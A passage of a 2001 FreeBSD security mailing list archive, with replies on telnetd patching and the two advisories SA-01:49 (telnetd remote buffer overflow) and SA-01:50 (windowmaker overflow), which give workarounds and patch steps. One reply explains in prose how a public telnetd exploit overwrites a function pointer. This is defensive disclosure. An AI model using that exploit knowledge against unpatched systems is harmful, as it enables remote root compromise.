by obsecurity.dyndns.org (Postfix, from userid 1000) id 4E9B266E94; Fri, 27 Jul 2001 11:39:08 -0700 (PDT) Date: Fri, 27 Jul 2001 11:39:08 -0700 From: Kris Kennaway To: Matthew Emmerton Cc: security@FreeBSD.ORG Subject: Re: problem with telnetd patch Message-ID: <20010727113907.B31276@xor.obsecurity.org> References: <005301c1168f$cc478c60$1200a8c0@gsicomp.on.ca> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="NMuMz9nt05w80d4+" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <005301c1168f$cc478c60$1200a8c0@gsicomp.on.ca>; from matt@gsicomp.on.ca on Fri, Jul 27, 2001 at 07:32:20AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --NMuMz9nt05w80d4+ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jul 27, 2001 at 07:32:20AM -0400, Matthew Emmerton wrote: > [ please cc, not on security- ] >=20 > Folks, >=20 > I just updated one of my client's machines to RELENG_4_3, and attempted to > update telnetd. >=20 > I used: >=20 > cd /usr/src/secure/libexec/telnetd > make depend && make all install >=20 > which failed, complaining of unresolved Kerberos symbols. >=20 > To fix the problem, I had to add ${LIBKRB} and ${LIBCOM_ERR} to the DPADD > line of the Makefile, and -lkrb and -lcom_err to the LDADD line of the > Makefile. >=20 > The machine that I was upgrading was a clean install of 4.3-REL from a few > months ago, no cvsup's of any source since then. Any ideas why I was > running into this problem? You had previously built the kerberosIV telnetd and it was picking up the copy of libtelnet.a which it bogusly installs into /usr/lib. This was overlooked in the initial advisory. Kris --NMuMz9nt05w80d4+ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7YbVKWry0BWjoQKURAqdcAKDD4UvH9r4g+s1dDjNxzx0n+Lo/dgCaAgF/ obiBq1vFapxI4NjMYplFO8k= =Ldkf -----END PGP SIGNATURE----- --NMuMz9nt05w80d4+-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 11:40:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 48AC637B403 for ; Fri, 27 Jul 2001 11:40:31 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 8368E66B25; Fri, 27 Jul 2001 11:40:30 -0700 (PDT) Date: Fri, 27 Jul 2001 11:40:30 -0700 From: Kris Kennaway To: "Andrew R. Reiter" Cc: kris@obsecurity.org, freebsd-security@freebsd.org Subject: Re: inetd.conf -- IPv6 telnet Message-ID: <20010727114029.C31276@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="lMM8JwqTlfDpEaS6" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from arr@watson.org on Fri, Jul 27, 2001 at 01:06:12PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --lMM8JwqTlfDpEaS6 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jul 27, 2001 at 01:06:12PM -0400, Andrew R. Reiter wrote: > kris, >=20 > just wondering about this thing i just noticed in 4-stable that telnet > comes default running under IPv6 in inetd.conf. not sure how likely > someone would exploit over IPv6, but i was wondering about consistancy in > relation to what's being done already for IPv4? What do you mean by 'consistency'? It's the same source code (hence already fixed), and the advisory mentioned disabling both ipv4 and ipv6 telnetd services as a workaround. Kris --lMM8JwqTlfDpEaS6 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7YbWdWry0BWjoQKURAkPwAJ9itHcdmRhg8wGrf23By2qhvKxvGQCdE5N9 j8RqUKdEvxiUjY6dHwS4YXo= =P//G -----END PGP SIGNATURE----- --lMM8JwqTlfDpEaS6-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 12:13: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from palanthas.neverending.org (tc01-216-34-188-140.ync.net [216.34.188.140]) by hub.freebsd.org (Postfix) with ESMTP id 5CE2537B401 for ; Fri, 27 Jul 2001 12:13:01 -0700 (PDT) (envelope-from ftobin@uiuc.edu) Received: by palanthas.neverending.org (Postfix, from userid 1000) id 476B126C2D; Fri, 27 Jul 2001 14:13:00 -0500 (CDT) Received: from localhost (localhost [127.0.0.1]) by palanthas.neverending.org (Postfix) with ESMTP id 10D8E22E0D; Fri, 27 Jul 2001 14:13:00 -0500 (CDT) Date: Fri, 27 Jul 2001 14:12:59 -0500 (CDT) From: Frank Tobin X-X-Sender: To: "Janusz Mucka (Defacto)" Cc: Subject: Re: identd with NAT support In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Janusz Mucka (Defacto), at 20:21 +0200 on Fri, 27 Jul 2001, wrote: Is there any implementation od identd which support identd on NAT like oidentd does. How to assign idents to windows machines through nat like oidentd does? Take a look at applying some of the "auth" options for inetd on the gateway. Search for "auth" in the inetd manpage. -- Frank Tobin http://www.uiuc.edu/~ftobin/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 12:29:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id EA0BD37B403 for ; Fri, 27 Jul 2001 12:29:30 -0700 (PDT) (envelope-from arr@watson.org) Received: from localhost (arr@localhost) by fledge.watson.org (8.11.4/8.11.4) with SMTP id f6RJTMC87467; Fri, 27 Jul 2001 15:29:22 -0400 (EDT) (envelope-from arr@watson.org) Date: Fri, 27 Jul 2001 15:29:21 -0400 (EDT) From: "Andrew R. Reiter" To: Kris Kennaway Cc: freebsd-security@freebsd.org Subject: Re: inetd.conf -- IPv6 telnet In-Reply-To: <20010727114029.C31276@xor.obsecurity.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org consistency in terms of inetd.conf #'ing out telnet from being started, this is completely disregarding what has occured lately from the vulnerability. in inetd.conf, it comments the ipv4 telnetd so it wont be started (by default). But in ipv6 telnetd, it does not... Just wondering about some consistency with taht. On Fri, 27 Jul 2001, Kris Kennaway wrote: > On Fri, Jul 27, 2001 at 01:06:12PM -0400, Andrew R. Reiter wrote: > > kris, > > > > just wondering about this thing i just noticed in 4-stable that telnet > > comes default running under IPv6 in inetd.conf. not sure how likely > > someone would exploit over IPv6, but i was wondering about consistancy in > > relation to what's being done already for IPv4? > > What do you mean by 'consistency'? It's the same source code (hence > already fixed), and the advisory mentioned disabling both ipv4 and > ipv6 telnetd services as a workaround. > > Kris > *-------------................................................. | Andrew R. Reiter | arr@fledge.watson.org | "It requires a very unusual mind | to undertake the analysis of the obvious" -- A.N. Whitehead To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 12:37:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 1F1A337B401 for ; Fri, 27 Jul 2001 12:37:34 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id A1F1366E8E; Fri, 27 Jul 2001 12:37:33 -0700 (PDT) Date: Fri, 27 Jul 2001 12:37:31 -0700 From: Kris Kennaway To: "Andrew R. Reiter" Cc: Kris Kennaway , freebsd-security@freebsd.org Subject: Re: inetd.conf -- IPv6 telnet Message-ID: <20010727123727.A46663@xor.obsecurity.org> References: <20010727114029.C31276@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="SUOF0GtieIMvvwua" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from arr@watson.org on Fri, Jul 27, 2001 at 03:29:21PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --SUOF0GtieIMvvwua Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jul 27, 2001 at 03:29:21PM -0400, Andrew R. Reiter wrote: >=20 > consistency in terms of inetd.conf #'ing out telnet from being started, > this is completely disregarding what has occured lately from the > vulnerability.=20 >=20 > in inetd.conf, it comments the ipv4 telnetd so it wont be started (by > default). But in ipv6 telnetd, it does not... Just wondering about some > consistency with taht. I show both of them uncommented by default, and the advisory tells you to comment both out. Kris --SUOF0GtieIMvvwua Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7YcL3Wry0BWjoQKURAif4AKDCaEb7RxbQ49zXviyhnX9gcdhRxgCfTWAG sg3tBVzO2liFaIce7+YUxCY= =fX7x -----END PGP SIGNATURE----- --SUOF0GtieIMvvwua-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 13: 1: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 68C0537B403; Fri, 27 Jul 2001 13:00:28 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.4/8.11.4) id f6RK0SJ17592; Fri, 27 Jul 2001 13:00:28 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Date: Fri, 27 Jul 2001 13:00:28 -0700 (PDT) Message-Id: <200107272000.f6RK0SJ17592@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-01:49.telnetd [REVISED] Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:49 Security Advisory FreeBSD, Inc. Topic: telnetd contains remote buffer overflow Category: core Module: telnetd Announced: 2001-07-23 Revised: 2001-07-27 Credits: Sebastian Affects: All releases of FreeBSD 3.x, 4.x prior to 4.4, FreeBSD 4.3-STABLE prior to the correction date Corrected: 2001-07-23 FreeBSD only: NO 0. Revision History 2001-07-23 v1.0 Initial release 2001-07-27 v1.1 Updated patch instructions, kerberosIV package available, added reference to SSH in workarounds. I. Background telnetd is the server for the telnet remote virtual terminal protocol. II. Problem Description An overflowable buffer was found in the version of telnetd included with FreeBSD. Due to incorrect bounds checking of data buffered for output to the remote client, an attacker can cause the telnetd process to overflow the buffer and crash, or execute arbitrary code as the user running telnetd, usually root. A valid user account and password is not required to exploit this vulnerability, only the ability to connect to a telnetd server. The telnetd service is enabled by default on all FreeBSD installations if the 'high' security setting is not selected at install-time. This vulnerability is known to be exploitable, and is being actively exploited in the wild. All released versions of FreeBSD prior to the correction date including 3.5.1-RELEASE and 4.3-RELEASE are vulnerable to this problem. It was corrected prior to the forthcoming release of 4.4-RELEASE. III. Impact Remote users can cause arbitrary code to be executed as the user running telnetd, usually root. IV. Workaround 1) Disable the telnet service, which is usually run out of inetd: comment out the following lines in /etc/inetd.conf, if present. telnet stream tcp nowait root /usr/libexec/telnetd telnetd telnet stream tcp6 nowait root /usr/libexec/telnetd telnetd and execute the following command as root: # kill -HUP `cat /var/run/inetd.pid` An alternative remote login protocol such as the SSH secure shell protocol (which is installed by default in FreeBSD), can be used instead. The SSH protocol is the recommended protocol for remote logins to FreeBSD systems because of the superior authentication, confidentiality and integrity protection it supplies relative to other protocols such as telnet. 2) Impose access restrictions using TCP wrappers (/etc/hosts.allow), or a network-level packet filter such as ipfw(8) or ipf(8) on the perimeter firewall or the local machine, to limit access to the telnet service to trusted machines. V. Solution One of the following: 1) Upgrade your vulnerable FreeBSD system to 4.3-STABLE or the RELENG_4_3 security branch after the respective correction dates. 2) FreeBSD 3.5.1, 4.x systems prior to the correction date: There are two versions of the patch available, for systems with and without the /usr/src/crypto/telnet sources. To determine whether your system has the crypto-telnet sources installed, perform the following command: # ls /usr/src/crypto/telnet/telnetd A response of ls: /usr/src/crypto/telnet/telnetd: No such file or directory indicates you do not have the crypto sources present and should download the non-crypto-telnet patch: see section 2b) below. These patches have been verified to apply to FreeBSD 4.2-RELEASE, 4.3-RELEASE and 3.5.1-STABLE dated prior to 2001-07-20 (users of 3.5.1-RELEASE must have applied the patches from FreeBSD Security Advisory 00:69 prior to applying this patch). These patches may or may not apply to older, unsupported releases of FreeBSD. 2a) For systems with the crypto-telnet sources installed Under FreeBSD 4.x, the crypto-telnet client can be built in two versions: with or without support for the KerberosIV authentication system. Under FreeBSD 3.x there is only one way to build the crypto-telnet client: with KerberosIV support. To determine whether your system has the kerberosIV distribution installed, perform the following command: # ls /usr/lib/libkrb.a Possible responses: /usr/lib/libkrb.a # This response indicates you have kerberosIV present ls: /usr/lib/libkrb.a: No such file or directory # This reponse indicates you do not have # kerberosIV present Download the patch and the detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd-crypto.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd-crypto.patch.asc 2aa) For systems with the crypto-telnet sources installed but without KerberosIV installed [FreeBSD 4.x systems] # cd /usr/src/ # patch -p < /path/to/patch # cd /usr/src/secure/lib/libtelnet # make depend && make all # cd /usr/src/secure/libexec/telnetd # make depend && make all install [FreeBSD 3.x systems] # cd /usr/src/ # patch -p < /path/to/patch # cd /usr/src/lib/libtelnet # make depend && make all # cd /usr/src/libexec/telnetd # make depend && make all install 2ab) For systems with the crypto-telnet sources installed and with KerberosIV installed # cd /usr/src/ # patch -p < /path/to/patch # cd /usr/src/kerberosIV/lib/libtelnet # make depend && make all # cd /usr/src/kerberosIV/libexec/telnetd # make depend && make all install 2b) For systems without the crypto-telnet sources installed Download the patch and the detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd.patch.asc # cd /usr/src/ # patch -p < /path/to/patch # cd /usr/src/lib/libtelnet # make depend && make all # cd /usr/src/libexec/telnetd # make depend && make all install 3) FreeBSD 4.3-RELEASE systems: An experimental upgrade package is available for users who wish to provide testing and feedback on the binary upgrade process. This package may be installed on FreeBSD 4.3-RELEASE systems only, and is intended for use on systems for which source patching is not practical or convenient. If you use the upgrade package, feedback (positive or negative) to security-officer@FreeBSD.org is requested so we can improve the process for future advisories. During the installation procedure, backup copies are made of the files which are replaced by the package. These backup copies will be reinstalled if the package is removed, reverting the system to a pre-patched state. Three versions of the upgrade package are available, depending on whether or not the system has the crypto or kerberosIV distributions installed. To determine whether your system has the crypto distribution installed, perform the following command: # ls /usr/bin/openssl Possible responses: /usr/bin/openssl # This response indicates you have crypto present ls: /usr/bin/openssl: No such file or directory # This reponse indicates you do not have # crypto present To determine whether your system has the kerberosIV distribution installed, perform the following command: # ls /usr/lib/libkrb.a Possible responses: /usr/lib/libkrb.a # This response indicates you have kerberosIV present ls: /usr/lib/libkrb.a: No such file or directory # This reponse indicates you do not have # kerberosIV present 3a) If crypto is present # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-crypto-01.49.tgz # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-crypto-01.49.tgz.asc Verify the detached PGP signature using your PGP utility. # pkg_add security-patch-telnetd-crypto-01.49.tgz 3b) If kerberosIV is present # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-kerberosIV-01.49.tgz # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-kerberosIV-01.49.tgz.asc Verify the detached PGP signature using your PGP utility. # pkg_add security-patch-telnetd-kerberosIV-01.49.tgz 3c) If neither crypto nor kerberosIV are present # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-01.49.tgz # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-01.49.tgz.asc Verify the detached PGP signature using your PGP utility. # pkg_add security-patch-telnetd-01.49.tgz -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBO2HHK1UuHi5z0oilAQH9dwP/eupJuy60kLzGcJx5JVfDHyv0IoNvnMX2 OsQw4+PwcvVv3r2nQn8FAiGa5WYlG+9Ft/s9XWuCUtWt35EiCmdo9I/72vuOasHN goiu+i+ncJeAp2BrgXerilHqBQnVnMI+QQrmKBiyhUPA3xR+t6JxRfk2DaCYSuvx tEQXDNB7wxU= =3OFg -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 13:20:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B99E937B401; Fri, 27 Jul 2001 13:20:36 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.4/8.11.4) id f6RKKaH25447; Fri, 27 Jul 2001 13:20:36 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Date: Fri, 27 Jul 2001 13:20:36 -0700 (PDT) Message-Id: <200107272020.f6RKKaH25447@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-01:50.windowmaker Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:50 Security Advisory FreeBSD, Inc. Topic: windowmaker contains possibly exploitable buffer overflow Category: ports Module: windowmaker/windowmaker-i18n Announced: 2001-07-27 Credits: Robert Marshall Affects: Ports collection prior to the correction date. Corrected: 2001-07-24 Vendor status: Updated version released FreeBSD only: NO I. Background Windowmaker is a GNUstep-compliant X11 window manager which emulates the NeXTSTEP interface. II. Problem Description The windowmaker ports, versions prior to windowmaker-0.65.0_2 and windowmaker-i18n-0.65.0_1, contain a potentially exploitable buffer overflow when displaying a very long window title in the window list menu. Since programs such as web browsers will include the contents of a webpage's title tag in window titles, this problem may allow authors of malicious webpages to cause windowmaker to crash and potentially execute arbitrary code as the user running windowmaker. The windowmaker ports are not installed by default, nor are they "part of FreeBSD" as such: they are part of the FreeBSD ports collection, which contains over 5500 third-party applications in a ready-to-install format. The ports collection shipped with FreeBSD 4.3 is vulnerable to this problem since it was discovered after its release. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Under certain circumstances, remote webservers may cause windowmaker to crash and potentially execute arbitrary code as the user running windowmaker. If you have not chosen to install the windowmaker port/package, then your system is not vulnerable to this problem. IV. Workaround Deinstall the windowmaker package if you have installed it. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the windowmaker or windowmaker-i18n port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from the following directories: [i386] ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/x11-wm/windowmaker-0.65.1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/x11-wm/windowmaker-0.65.1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/x11-wm/windowmaker-i18n-0.65.0_1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/x11-wm/windowmaker-i18n-0.65.0_1.tgz [alpha] Packages are not automatically generated for the alpha architecture at this time due to lack of build resources. 3) download a new port skeleton for the windowmaker or windowmaker-i18n port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBO2HM5VUuHi5z0oilAQH8ZAP9GibPUuDW96J9ylQs/V3aoTblSlw3zaXX 8EkouFxYEDTk0LBJfwyq343z4OfrM21A8gxlQiW+b620JkNkL795zkRQ01DxbQle bDaOOICvXpVmHyI0Xxn3qLCeQJpuNhJkT5kvf+49q4ldljsIiHNc6FFTOpcA0SlW NKPR3OpUy+o= =A5Cb -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 14: 1:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from ldc.ro (ldc-gw.pub.ro [192.129.3.227]) by hub.freebsd.org (Postfix) with SMTP id D581737B403 for ; Fri, 27 Jul 2001 14:01:06 -0700 (PDT) (envelope-from razor@ldc.ro) Received: (qmail 24827 invoked by uid 666); 27 Jul 2001 21:01:05 -0000 Date: Fri, 27 Jul 2001 23:51:53 +0300 From: Alex Popa To: FreeBSD Security Advisories Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:50.windowmaker Message-ID: <20010727235153.A21221@ldc.ro> References: <200107272020.f6RKKaH25447@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200107272020.f6RKKaH25447@freefall.freebsd.org>; from security-advisories@FreeBSD.org on Fri, Jul 27, 2001 at 01:20:36PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Something tells me this should be a FreeBSD Ports Security Advisory. ^^^^^ Unless this has changed so much since I *really* read this list. Have Fun! Alex ------------+------------------------------------------ Alex Popa, | "Artificial Intelligence is razor@ldc.ro| no match for Natural Stupidity" ------------+------------------------------------------ "It took the computing power of three C-64s to fly to the Moon. It takes a 486 to run Windows 95. Something is wrong here." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 14: 3: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.orem.verio.net (gatekeeper.orem.verio.net [192.41.0.8]) by hub.freebsd.org (Postfix) with ESMTP id D475137B401 for ; Fri, 27 Jul 2001 14:03:00 -0700 (PDT) (envelope-from hart@orem.verio.net) Received: from mx.dmz.orem.verio.net (mx.dmz.orem.verio.net [10.1.1.10]) by gatekeeper.orem.verio.net (Postfix) with ESMTP id AC33D3BF17C for ; Fri, 27 Jul 2001 15:03:00 -0600 (MDT) Received: from localhost (hart@localhost) by mx.dmz.orem.verio.net (8.11.1/8.11.1) with ESMTP id f6RL2uO96320; Fri, 27 Jul 2001 15:03:00 -0600 (MDT) (envelope-from hart@mx.dmz.orem.verio.net) Date: Fri, 27 Jul 2001 15:02:56 -0600 (MDT) From: Paul Hart To: Nuno Teixeira Cc: Subject: Re: Updating security fixes without single user mode? In-Reply-To: <20010726015730.F5227@gateway.bogus> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 26 Jul 2001, Nuno Teixeira wrote: > The problem is that my server is at US and I live in Portugal! So, > it's impossible to run the system in single user mode. Isn't that the most compelling reason to use the serial console support in FreeBSD? Paul Hart -- Paul Robert Hart hart@orem.verio.net Jul ner lbh ernqvat guvf? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 14:18:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.orem.verio.net (gatekeeper.orem.verio.net [192.41.0.8]) by hub.freebsd.org (Postfix) with ESMTP id DFCBA37B401 for ; Fri, 27 Jul 2001 14:18:11 -0700 (PDT) (envelope-from hart@orem.verio.net) Received: from mx.dmz.orem.verio.net (mx.dmz.orem.verio.net [10.1.1.10]) by gatekeeper.orem.verio.net (Postfix) with ESMTP id B3B8A3BF199 for ; Fri, 27 Jul 2001 15:18:11 -0600 (MDT) Received: from localhost (hart@localhost) by mx.dmz.orem.verio.net (8.11.1/8.11.1) with ESMTP id f6RLIBh97773; Fri, 27 Jul 2001 15:18:11 -0600 (MDT) (envelope-from hart@mx.dmz.orem.verio.net) Date: Fri, 27 Jul 2001 15:18:11 -0600 (MDT) From: Paul Hart To: Jim Sander Cc: Subject: Re: Telnet exploit & 3.4-RELEASE In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 26 Jul 2001, Jim Sander wrote: > Telnet definitely functions, and the exploit doesn't seem to succeed- > but then it didn't work before either, so who knows for sure. The exploit posted to Bugtraq DOES work on FreeBSD 3.4-RELEASE but only if you selected to install an encrypting telnetd when you set the machine up. At installation time there is a prompt about whether you want to install DES software. If you select "Yes" and install the "krb" package you'll get a telnetd that understands using encryption, but unfortunately for you it's the exploitable one. The "regular" telnetd still has the overflow (which may or may not be exploitable) but the posted exploit by TESO targets encrypting versions that have the encrypt_output function pointer in the BSS after netobuf. The function pointer gets overwritten when netobuf overflows and that is the basis of the exploit. The regular telnetd (if that's the one you installed) doesn't have any such function pointer to exploit and thus isn't vulnerable to this particular exploit by TESO. Like I said though, the overflow is still present and it may or may not be exploitable by other means. Paul Hart -- Paul Robert Hart hart@orem.verio.net Jul ner lbh ernqvat guvf? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 20:30:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from tao.thought.org (sense-kline-248.oz.net [216.39.168.248]) by hub.freebsd.org (Postfix) with ESMTP id EBC5437B403 for ; Fri, 27 Jul 2001 20:30:30 -0700 (PDT) (envelope-from kline@tao.thought.org) Received: (from kline@localhost) by tao.thought.org (8.11.3/8.11.0) id f6S3UMH38550; Fri, 27 Jul 2001 20:30:22 -0700 (PDT) (envelope-from kline) Date: Fri, 27 Jul 2001 20:30:22 -0700 From: Gary Kline To: Kris Kennaway Cc: Gary Kline , security@freebsd.org Subject: Re: New windowmaker install bombs... Message-ID: <20010727203021.A38510@tao.thought.org> References: <200107280044.f6S0iIO38293@tao.thought.org> <20010727195206.A58147@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20010727195206.A58147@xor.obsecurity.org>; from kris@obsecurity.org on Fri, Jul 27, 2001 at 07:52:06PM -0700 X-Organization: Thought Unlimited. Public service Unix since 1986. X-Of_Interest: Observing 15 years of service to the Unix community Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jul 27, 2001 at 07:52:06PM -0700, Kris Kennaway wrote: > On Fri, Jul 27, 2001 at 